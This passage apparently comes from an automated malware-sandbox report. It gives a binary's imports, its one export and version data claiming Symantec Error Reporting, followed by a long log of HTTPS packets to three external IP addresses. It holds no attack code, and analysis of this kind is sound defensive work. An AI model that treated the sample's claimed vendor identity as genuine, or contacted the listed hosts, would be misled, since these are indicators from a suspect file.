                          user32.dllIsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                          Exports

                          NameOrdinalAddress
                          DllRegisterServer10x1002513f

                          Version Infos

                          DescriptionData
                          LegalCopyrightCopyright 2016 Symantec Corporation. All rights reserved.
                          InternalNameSymErr
                          FileVersion7.6.2.5
                          CompanyNameSymantec Corporation
                          ProductNameSymantec Shared Component
                          ProductVersion7.6
                          FileDescriptionSymantec Error Reporting
                          OriginalFilenameSymErr.exe
                          Translation0x0409 0x04b0

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 14, 2021 10:33:56.169133902 CET49772443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.169179916 CET4434977218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.169270992 CET49772443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.170115948 CET49772443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.170137882 CET4434977218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.320444107 CET4434977218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.323769093 CET49773443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.323807001 CET4434977318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.323893070 CET49773443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.325078011 CET49773443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.325093985 CET4434977318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.384921074 CET49774443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.384965897 CET4434977418.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.385071993 CET49774443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.385968924 CET49774443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.385997057 CET4434977418.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.445888996 CET49775443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.445933104 CET443497753.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.446013927 CET49775443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.446840048 CET49775443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.446865082 CET443497753.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.475581884 CET4434977318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.477123976 CET49776443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.477180004 CET4434977618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.477348089 CET49776443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.478054047 CET49776443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.478080034 CET4434977618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.536524057 CET4434977418.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.538096905 CET49777443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.538141012 CET4434977718.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.538228035 CET49777443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.539164066 CET49777443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.539185047 CET4434977718.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.597301960 CET443497753.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.599082947 CET49778443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.599128008 CET443497783.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.599239111 CET49778443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.600239038 CET49778443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.600253105 CET443497783.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.628398895 CET4434977618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.629982948 CET49779443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.630032063 CET4434977918.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.630146980 CET49779443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.630968094 CET49779443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.630990982 CET4434977918.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.689443111 CET4434977718.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.691081047 CET49780443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.691126108 CET4434978018.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.691215992 CET49780443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.692574978 CET49780443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.692596912 CET4434978018.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.750622034 CET443497783.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.752547979 CET49781443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.752585888 CET443497813.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.752688885 CET49781443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.753557920 CET49781443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.753567934 CET443497813.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.755451918 CET49782443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.755487919 CET4434978218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.755567074 CET49782443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.756136894 CET49782443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.756164074 CET4434978218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.781342030 CET4434977918.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.843327045 CET4434978018.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.845531940 CET49783443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.845575094 CET4434978318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.845649958 CET49783443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.846473932 CET49783443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.846491098 CET4434978318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.903898001 CET443497813.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.905615091 CET49784443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.905653000 CET443497843.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.905747890 CET49784443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.906493902 CET4434978218.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.906672955 CET49784443192.168.2.53.12.124.139
                          Dec 14, 2021 10:33:56.906692982 CET443497843.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:56.908546925 CET49785443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.908580065 CET4434978518.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.908668995 CET49785443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.909574032 CET49785443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:56.909584999 CET4434978518.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:56.996841908 CET4434978318.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.057349920 CET443497843.12.124.139192.168.2.5
                          Dec 14, 2021 10:33:57.060131073 CET4434978518.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.065263033 CET49786443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.065311909 CET4434978618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.065414906 CET49786443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.066065073 CET49786443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.066081047 CET4434978618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.216689110 CET4434978618.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.226584911 CET49787443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.226634979 CET4434978718.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.226720095 CET49787443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.227541924 CET49787443192.168.2.518.219.227.107
                          Dec 14, 2021 10:33:57.227566004 CET4434978718.219.227.107192.168.2.5
                          Dec 14, 2021 10:33:57.378197908 CET4434978718.219.227.107192.168.2.5
                          Dec 14, 2021 10:34:06.990562916 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:06.990613937 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:06.990704060 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:06.991794109 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:06.991816998 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.082719088 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.082829952 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.085036993 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.085048914 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.085258007 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.087317944 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.128906965 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.185785055 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.185831070 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.185883999 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.185924053 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.185949087 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.185971975 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.186019897 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187247038 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187302113 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187354088 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187377930 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187450886 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187468052 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.209757090 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.209801912 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.210836887 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216116905 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.216147900 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216173887 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216298103 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.224546909 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.224595070 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.224706888 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.226381063 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.226412058 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232654095 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232695103 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232803106 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.232842922 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232862949 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.233596087 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233634949 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233700037 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.233722925 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233741999 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.234407902 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234446049 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234505892 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.234528065 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234549999 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235137939 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235188007 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235208035 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235224009 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235290051 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235382080 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235419989 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235455036 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235476971 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235500097 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235699892 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235740900 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235780954 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235800982 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235822916 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.236316919 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236355066 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236418009 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.236442089 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236459017 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.240600109 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257313013 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257358074 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257421017 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257437944 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257467985 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257617950 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257905006 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258781910 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258809090 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.258944035 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258956909 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.264395952 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.264424086 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.264484882 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.265105963 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.265121937 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.304610014 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.304718018 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.306762934 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.306777954 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.307193995 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.310327053 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.344216108 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.344341040 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.346394062 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.346417904 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.346971035 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.348973989 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.352890968 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391892910 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391928911 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391961098 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.392038107 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392082930 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.392102003 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392159939 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392874002 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393558025 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393594980 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393692970 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.393716097 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393732071 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.393990040 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416309118 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416358948 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416429043 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416465044 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416487932 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416950941 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417088985 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417133093 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417177916 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417191982 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417244911 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417253971 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417695045 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417742968 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417818069 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417831898 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417850971 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.419253111 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.437350988 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437383890 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437407970 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437532902 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.437561989 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437732935 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.438250065 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438281059 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438347101 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.438364983 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438376904 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.439080000 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440407991 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440448046 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440541983 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440578938 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440612078 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440958023 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441293001 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441338062 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441411018 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441432953 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441448927 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441488028 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441803932 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441840887 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441900015 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441914082 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441931009 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442204952 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442414045 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442444086 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442523003 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442536116 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.442553043 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.442605972 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443058014 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443088055 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443140030 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443152905 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443196058 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443216085 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443734884 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443768024 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.443936110 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.443954945 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444250107 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444317102 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444344997 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444405079 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444417000 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.444437981 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.444478035 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.450846910 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.450906992 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.451057911 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.451829910 CET49798443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.451868057 CET4434979879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461358070 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461386919 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461477041 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.461507082 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.461520910 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.461690903 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462296009 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462321043 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462404013 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462429047 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.462440968 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.462546110 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463115931 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463140965 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463217020 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463238001 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463260889 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463306904 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.463884115 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463927031 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.463979959 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464006901 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464023113 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464099884 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464113951 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464133024 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.464199066 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464538097 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.464559078 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486041069 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486095905 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486154079 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486177921 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486201048 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486213923 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486597061 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486641884 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486690044 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486700058 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.486723900 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.486757040 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487169981 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487221956 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487251043 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487262011 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487344027 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487348080 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487658978 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487698078 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487725019 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.487735987 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.487771034 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.488480091 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.488518953 CET4434979779.110.52.144192.168.2.5
